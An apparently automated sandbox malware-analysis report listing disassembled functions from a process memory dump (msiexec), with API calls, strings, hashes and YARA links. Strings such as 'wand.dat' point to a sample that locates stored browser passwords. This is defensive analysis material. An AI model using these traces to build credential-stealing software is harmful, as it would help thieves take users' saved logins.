                                                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 210187428-168460110
                                                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                    • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                    • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                    • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                    • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 3384217055-0
                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                    • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889144086-0
                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1661045500-0
                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                    Strings
                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1549203181-0
                                                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3550944819-0
                                                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                    Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$free
                                                                                                    • String ID: g4@
                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                    • Opcode ID: a6efa1a5bb6df3a3b34dcbd06103d1285660d4d366aaabdaadc0d2e1589271b6
                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                    • Opcode Fuzzy Hash: a6efa1a5bb6df3a3b34dcbd06103d1285660d4d366aaabdaadc0d2e1589271b6
                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: d2168fc35a9e51fc0f08b31e90096d62166f6d3a6d6a12b6b3cc3b12d0dfdf47
                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                    • Opcode Fuzzy Hash: d2168fc35a9e51fc0f08b31e90096d62166f6d3a6d6a12b6b3cc3b12d0dfdf47
                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1127616056-0
                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
